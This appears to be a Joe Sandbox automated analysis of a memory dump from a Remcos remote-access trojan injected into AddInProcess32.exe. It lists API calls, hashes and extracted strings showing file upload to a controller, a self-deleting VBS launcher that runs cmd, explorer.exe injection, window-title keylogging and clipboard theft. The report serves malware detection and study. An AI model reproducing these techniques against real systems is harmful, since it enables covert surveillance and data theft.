• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
• GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
• __aulldiv.LIBCMT ref: 00408D88
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
• CloseHandle.KERNEL32(00000000), ref: 00408F9F
• CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
• CloseHandle.KERNEL32(00000000), ref: 00409037
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
• API String ID: 3086580692-2596673759
APIs
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
  • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
  • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
  • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
• ExitProcess.KERNEL32 ref: 0040D9FF
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
• String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$Temp$exepath$open
• API String ID: 1913171305-833065420
APIs
• connect.WS2_32(?,?,?), ref: 004048E0
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
• WSAGetLastError.WS2_32 ref: 00404A21
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: CreateEvent$ErrorLastLocalTimeconnect
• String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
• API String ID: 994465650-2151626615
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
• GetLastError.KERNEL32 ref: 00455D6F
• __dosmaperr.LIBCMT ref: 00455D76
• GetFileType.KERNEL32(00000000), ref: 00455D82
• GetLastError.KERNEL32 ref: 00455D8C
• __dosmaperr.LIBCMT ref: 00455D95
• CloseHandle.KERNEL32(00000000), ref: 00455DB5
• CloseHandle.KERNEL32(?), ref: 00455EFF
• GetLastError.KERNEL32 ref: 00455F31
• __dosmaperr.LIBCMT ref: 00455F38
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: _free
• String ID: \&G$\&G$`&G
• API String ID: 269201875-253610517
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: 65535$udp
• API String ID: 0-1267037602

APIs
• __Init_thread_footer.LIBCMT ref: 0040AD73
• Sleep.KERNEL32(000001F4), ref: 0040AD7E
• GetForegroundWindow.USER32 ref: 0040AD84
• GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
• Sleep.KERNEL32(000003E8), ref: 0040AE8F
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$]

APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
• GetLastError.KERNEL32(?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
• __dosmaperr.LIBCMT ref: 0043A926
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
• GetLastError.KERNEL32(?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
• __dosmaperr.LIBCMT ref: 0043A963
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401BD9,?), ref: 0043A9A6
• GetLastError.KERNEL32(?,?,?,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
• __dosmaperr.LIBCMT ref: 0043A9B7
• _free.LIBCMT ref: 0043A9C3
• _free.LIBCMT ref: 0043A9CA
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
• String ID:

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,?,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
• __alloca_probe_16.LIBCMT ref: 0044AD5B
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
• __alloca_probe_16.LIBCMT ref: 0044AE40
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
• __freea.LIBCMT ref: 0044AEB0
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
• __freea.LIBCMT ref: 0044AEB9
• __freea.LIBCMT ref: 0044AEDE
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID: tC

APIs
• SetEvent.KERNEL32(?,?), ref: 004054BF
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
• TranslateMessage.USER32(?), ref: 0040557E
• DispatchMessageA.USER32(?), ref: 00405589
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F88), ref: 00405641
• HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage

APIs
  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
• CloseHandle.KERNEL32(00000000), ref: 00417E20
• DeleteFileA.KERNEL32(00000000), ref: 00417E2F
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
• String ID: <$@$@VG$@VG$Temp

APIs
• GetCurrentProcess.KERNEL32(00472B28,00000000,RGw@,00003000,00000004,00000000,00000001), ref: 00407418
• GetCurrentProcess.KERNEL32(00472B28,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 004074D9
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$RGw@

APIs
• OpenClipboard.USER32 ref: 0041697C
• EmptyClipboard.USER32 ref: 0041698A
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32(0000000D), ref: 004169A7
• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
• String ID: !D@

APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
• GetFileSize.KERNEL32(?,00000000), ref: 0041346D
• UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
• CloseHandle.KERNEL32(00000000), ref: 0041349A
• CloseHandle.KERNEL32(?), ref: 004134A0
• API ID: File$CloseHandleView$CreateMappingSizeUnmap
• String ID:

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
                                                                                                  • API String ID: 221034970-0
                                                                                                  • Opcode ID: eb6abd722e0cae9a5b5ac2f6fd433bf2c3c2a2b9123b5e78852541010ca8cce1
                                                                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                  • Opcode Fuzzy Hash: eb6abd722e0cae9a5b5ac2f6fd433bf2c3c2a2b9123b5e78852541010ca8cce1
                                                                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 004481B5
                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                  • _free.LIBCMT ref: 004481C1
                                                                                                  • _free.LIBCMT ref: 004481CC
                                                                                                  • _free.LIBCMT ref: 004481D7
                                                                                                  • _free.LIBCMT ref: 004481E2
                                                                                                  • _free.LIBCMT ref: 004481ED
                                                                                                  • _free.LIBCMT ref: 004481F8
                                                                                                  • _free.LIBCMT ref: 00448203
                                                                                                  • _free.LIBCMT ref: 0044820E
                                                                                                  • _free.LIBCMT ref: 0044821C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                  • GdiplusStartup.GDIPLUS(00474AE0,?,00000000), ref: 0041A07C
                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                  • API String ID: 489098229-3790400642
                                                                                                  • Opcode ID: 1e9a3ea07f3ba9663f53871a1ba899d2c1a6c9113445fefd5f34cae6c74d1812
                                                                                                  • Instruction ID: ac563f1b8c988fbcbdb25ffa0f060f034023d1de15a29d9718e9897573209577
                                                                                                  • Opcode Fuzzy Hash: 1e9a3ea07f3ba9663f53871a1ba899d2c1a6c9113445fefd5f34cae6c74d1812
                                                                                                  • Instruction Fuzzy Hash: 3F518E70A00215AACB14BBB5C8529FD77A9AF54308F40403FF509AB1E2EF7C4D85C799
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                  • String ID: HSG$HSG
                                                                                                  • API String ID: 3795512280-2729845973
                                                                                                  • Opcode ID: 66f46599578da9462cfc73df4298f3e368e9e17d46714e4cb5b61a7eab0f7c39
                                                                                                  • Instruction ID: b4a8632174cffc949347442128fe52ffedc09667b4c22c284aa084888e76bad6
                                                                                                  • Opcode Fuzzy Hash: 66f46599578da9462cfc73df4298f3e368e9e17d46714e4cb5b61a7eab0f7c39
                                                                                                  • Instruction Fuzzy Hash: AC518D716043015ACB15BB72C866ABE77AA9F80349F00483FF642B71E2DF7C9D09865E
                                                                                                  APIs
                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DecodePointer
                                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                  • API String ID: 3527080286-3064271455
                                                                                                  • Opcode ID: d3e7b15c46cdd208759493adff4216d8049d52db36716e3e1ce652e173acd39f
                                                                                                  • Instruction ID: 9e278d4a377d0ea10dd73248deb0d867b2e8f6339126d6964ada8e5ca1a1e79f
                                                                                                  • Opcode Fuzzy Hash: d3e7b15c46cdd208759493adff4216d8049d52db36716e3e1ce652e173acd39f
                                                                                                  • Instruction Fuzzy Hash: AA515071900909DBCB10DF58E9481BDBBB0FB49306F924197D841A7296DB798928CB1E
                                                                                                  APIs
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                  • API String ID: 1462127192-2001430897
                                                                                                  • Opcode ID: 37aa6dfc11f6c23b61123195fd4bee991378c13dd1bcd511b3cf646397b8e908
                                                                                                  • Instruction ID: 4d831fdf2c11e0d815db77489a542135a470e493f6e320739c61594aa9f7fbeb
                                                                                                  • Opcode Fuzzy Hash: 37aa6dfc11f6c23b61123195fd4bee991378c13dd1bcd511b3cf646397b8e908
                                                                                                  • Instruction Fuzzy Hash: A4313D71940119AADB04FBA1DC96DED7739AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                  • int.LIBCPMT ref: 00410EBC
                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                  • String ID: <kG$@kG
                                                                                                  • API String ID: 3815856325-1261746286
                                                                                                  • Opcode ID: a775fd09b9bd59cd8d1293661eff86217fedb4cdc6fe336e067938c0c3205025
                                                                                                  • Instruction ID: 0588f859592fb32d2b707c82d02c9514845f82bff388d80d729849e078334d39
                                                                                                  • Opcode Fuzzy Hash: a775fd09b9bd59cd8d1293661eff86217fedb4cdc6fe336e067938c0c3205025
                                                                                                  • Instruction Fuzzy Hash: 622107329005249BCB14FBAAD8429DE7769DF48324F21416FF904E72D1DBB9AD818BDC
                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                  • lstrcpynA.KERNEL32(00474B70,Remcos,00000080), ref: 0041D558
                                                                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B58), ref: 0041D56E
                                                                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                  • String ID: Remcos
                                                                                                  • API String ID: 1970332568-165870891
                                                                                                  • Opcode ID: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                                                                  • Instruction ID: c2fc9e39e559a2afed00746d39c192473857db467f2681b349ddfe36236392a3
                                                                                                  • Opcode Fuzzy Hash: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                                                                  • Instruction Fuzzy Hash: 11015EB1840348EBD7109FA1EC4CFABBBBCABC5705F00406AF505921A1D7B8E885CB6D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                  • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                  APIs
                                                                                                  • GetCPInfo.KERNEL32(?,?), ref: 00453EAF
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F32
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FC5
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453FDC
                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00454058
                                                                                                  • __freea.LIBCMT ref: 00454083
                                                                                                  • __freea.LIBCMT ref: 0045408F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 201697637-0
                                                                                                  • Opcode ID: 0e4c9693fbb30d8259a9360a9357c9a64508312006b92e836ecbd2da2b3ae83b
                                                                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                  • Opcode Fuzzy Hash: 0e4c9693fbb30d8259a9360a9357c9a64508312006b92e836ecbd2da2b3ae83b
                                                                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                  • _free.LIBCMT ref: 00445515
                                                                                                  • _free.LIBCMT ref: 0044552E
                                                                                                  • _free.LIBCMT ref: 00445560
                                                                                                  • _free.LIBCMT ref: 00445569
                                                                                                  • _free.LIBCMT ref: 00445575
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                  • String ID: C
                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                  • Opcode ID: 2813a1e0ac90985d52fee0968b9a0cfa35de9e1761f336dc1444ec918196fcc8
                                                                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                  • Opcode Fuzzy Hash: 2813a1e0ac90985d52fee0968b9a0cfa35de9e1761f336dc1444ec918196fcc8
                                                                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
